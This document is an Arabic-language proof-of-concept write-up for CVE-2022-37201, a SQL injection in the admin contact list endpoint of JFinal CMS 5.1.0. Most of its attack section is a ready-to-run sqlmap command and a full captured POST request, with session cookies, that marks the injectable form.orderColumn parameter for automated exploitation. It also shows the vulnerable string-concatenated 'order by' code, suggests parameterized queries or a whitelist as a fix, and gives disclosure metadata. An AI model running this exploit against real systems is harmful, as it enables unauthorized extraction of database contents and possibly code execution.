
CVE-2022-37201 POC
CVE-2022-37201 POC
أولاً، يجب عليك تثبيت sqlmap
تحتاج إلى تعيين
ثم قم بتشغيل الأمر
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list --thread 8 --batch --smart --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10" --cookie " your cookie " --current-db
image-20220730053527316
أحيانًا يجب أن تعلم أن المسار /jfinal_cms/ ليس ضروريًا، بل تحتاج إلى تحديد المسار
يمكنك رؤية كود الواجهة /system/menu/list
sql.append(" order by ").append(orderBy);
هناك عبارة SQL مباشرة تم دمجها
علاوة على ذلك
لا يوجد إجراء لمنع حقن SQL لأن حقن SQL مطلوب هنا
من خلال تحليل نقطة الوظيفة هذه، وجدت أن حقن orderby ثابت، مثل id و name و menu key، لذا يمكنك محاولة استخدام استعلام معلمي أو إنشاء قائمة بيضاء
اختباري
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
قم بتشغيلها في sqlmap!!! استخدم -r
[الوصف المقترح] JFinal CMS 5.1.0 معرض لحقن SQL.
[معلومات إضافية] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[نوع الثغرة] حقن SQL
[بائع المنتج] مجموعة التطوير
[قاعدة كود المنتج المتأثر] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0
[المكون المتأثر] لا تستخدم هذه الواجهات نفس المكون، كما أنها لا تحتوي على عوامل تصفية، بل يستخدم كل منها طريقة دمج SQL الخاصة به، مما يؤدي إلى حقن SQL
[نوع الهجوم] عن بعد
[تأثير تنفيذ الكود] true
[تأثير كشف المعلومات] true
[نواقل الهجوم] مطلوب تسجيل دخول المستخدم
[المرجع] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md
[المكتشف] jw5t